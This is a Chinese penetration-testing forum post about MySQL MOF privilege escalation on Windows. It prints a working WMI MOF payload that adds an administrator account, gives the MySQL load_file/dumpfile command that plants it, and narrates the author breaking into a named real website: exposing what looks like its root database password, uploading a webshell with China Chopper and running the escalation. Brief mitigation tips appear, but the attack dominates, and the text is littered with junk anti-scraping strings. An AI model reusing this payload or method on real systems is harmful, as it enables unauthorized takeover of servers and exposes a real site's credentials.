中国网络渗透测试联盟

标题: Mysql mof扩展漏洞实例与防范 [打印本页]

---

作者: admin    时间: 2013-1-4 19:49
标题: Mysql mof扩展漏洞实例与防范
Mysql mof扩展漏洞防范方法
5 O8 i$ ]# Z! F1 K
网上公开的一些利用代码:

#pragma namespace(“\\\\.\\root\\subscription”)

instance of __EventFilter as $EventFilter   {   EventNamespace = “Root\\Cimv2″;   Name  = “filtP2″;   Query = “Select * From __InstanceModificationEvent ”   “Where TargetInstance Isa \”Win32_LocalTime\” ”   “And TargetInstance.Second = 5″;   QueryLanguage = “WQL”;   };   instance of ActiveScriptEventConsumer as $Consumer   {   Name = “consPCSV2″;   ScriptingEngine = “JScript”;   ScriptText =   “var WSH = new ActiveXObject(\”WScript.Shell\”)\nWSH.run(\”net.exe user admin admin /add\”)”;   };   instance of __FilterToConsumerBinding   {   Consumer   = $Consumer;   Filter = $EventFilter;   };

4 U" d; L7 x  x' p4 O; P5 p) O' B
/ K; j0 m/ D- U/ g/ j0 s
/ A$ C  Q% l. W9 @" G4 ~
; i+ y* \5 Z  n7 Z; B/ m) u) n
连接mysql数据库后执行： select load_file(‘C:\\RECYCLER\\nullevt.mof’) into dumpfile ‘c:/windows/system32/wbem/mof/nullevt.mof’;
从上面代码来看得出解决办法：

1、mysql用户权限控制，禁止 “load_file”、”dumpfile”等函数
& _; G+ T9 }9 U3 d3 _
2、禁止使用”WScript.Shel”组件
  Y. n* s% H+ W8 h, t4 K
3、目录权限c:/windows/system32/wbem/mof/ 删除内置特殊组CREATOR OWNER
8 N" I5 M6 K, M
4 R) b, d: s, f5 p) e当然上面是网上说的 感觉需要的权限很大 比如 root 还有mysql外链昨天碰到了就给大家演示下
4 j( J( U) }5 H% H
事情是这样发生的  一机油在论坛提问我就看了下 发现已经有大牛搞下了 说是用是 mysql mof扩展提权

0 G% [. n* ^5 B: o1 p" G# a! M0 M但是小菜发现没有听过于是赶紧去查资料学习…就有了上面的来着网上的内容

  [: B: f3 H& g  y- F, P, P看懂了后就开始练手吧
$ N! r3 T' X% ~) ~" V& l
http://www.webbmw.com/config/config_ucenter.php 一句话 a

$_config['db']['1']['dbhost'] = ‘localhost’; $_config['db']['1']['dbuser'] = ‘root’; $_config['db']['1']['dbpw'] = ‘tfr226206′; $_config['db']['1']['dbcharset'] = ‘gbk’; $_config['db']['1']['pconnect'] = ’0′; $_config['db']['1']['dbname'] = ‘webbmw’; $_config['db']['1']['tablepre'] = ‘pre_’; $_config['db']['common']['slave_except_table'] = ”; 有root密码啊。
/ j; I" R) ^3 l7 J  x
! D) v/ I+ r2 K- U* F6 J0 F- i- c3 b2 F于是直接用菜刀开搞

$ U  Y- |7 J+ G+ B6 ?上马先

既然有了那些账号 之类的 于是我们就执行吧…….
2 O; G) c, g7 P8 G; `
小小的说下
; s* ?- O9 l# r- o# o; |
5 z7 P7 f  ^" e6 B) [# |在这里第1次执行未成功        原因未知
$ c: f4 ^, j0 W) S# K8 J0 \0 w
" q- Q0 V/ [4 k5 `1 x0 `* j- X9 S我就猜想是否是因为我们执行的代码有问题 于是我就去我wooyun找的代码。

, @( G/ u& I/ h; D' W. o3 |3 Z#pragma namespace(“\\\\.\\root\\subscription”)

instance of __EventFilter as $EventFilter   {   EventNamespace = “Root\\Cimv2″;   Name  = “filtP2″;   Query = “Select * From __InstanceModificationEvent ”   “Where TargetInstance Isa \”Win32_LocalTime\” ”   “And TargetInstance.Second = 5″;   QueryLanguage = “WQL”;   };   instance of ActiveScriptEventConsumer as $Consumer   {   Name = “consPCSV2″;   ScriptingEngine = “JScript”;   ScriptText =   “var WSH = new ActiveXObject(\”WScript.Shell\”)\nWSH.run(\”net.exe user test test /add\”)”;   };   instance of __FilterToConsumerBinding   {   Consumer   = $Consumer;   Filter = $EventFilter;   };

我是将文件放到C:\WINDOWS\temp\1.mof

/ X1 k( @% r% D+ K所以我们就改下执行的代码
: H! o; ]  B+ u  S6 z1 G
# z  b% T  ]- I' [/ Vselect load_file(‘C:\WINDOWS\temp\1.mof‘) into dumpfile ‘c:/windows/system32/wbem/mof/nullevt.mof’;

* z, k8 @9 ?* c, t* B; N
3 `- P8 }7 E. B! D3 L
但是 你会发现账号还是没有躺在那里。。

" ?2 A5 O6 M+ w( i5 k! y2 l) L" n于是我就感觉蛋疼

" }& S$ n) k; r' f" ?就去一个一个去执行 但是执行到第2个 mysql时就成功了………



2 C! z3 m' p5 z但是其他库均不成功…

我就很费解呀 到底为什么不成功求大牛解答…
; W( ?$ O0 `. p$ l! B* @
- `, E$ c5 n9 X' ]( P1 @1 C​

9 u8 c" \  x; u7 K

---

欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)

Powered by Discuz! X3.2